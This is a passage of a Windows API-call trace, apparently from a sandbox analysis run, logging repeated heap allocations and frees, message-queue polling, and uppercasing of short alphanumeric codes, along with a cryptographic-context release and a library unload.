wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.092] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.092] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.092] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.092] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.092] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.093] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.093] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.093] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.093] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.093] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.093] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.094] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.094] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.094] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.094] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.094] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.094] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.094] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.095] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.095] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.095] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.095] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.095] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.095] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.095] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.095] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.095] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.096] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.096] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.096] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.096] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.096] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.096] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.096] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.096] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.096] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.096] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.096] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.096] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.097] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.097] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.097] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.097] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.097] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.097] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.097] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.097] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0262.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.099] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.099] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.099] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.099] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.100] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.100] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.100] FreeLibrary (hLibModule=0x74d40000) returned 1 [0262.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.101] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.101] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.101] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.101] CloseHandle (hObject=0x294) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.102] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0262.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0262.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0262.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0262.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0262.104] RtlAllocateHeap 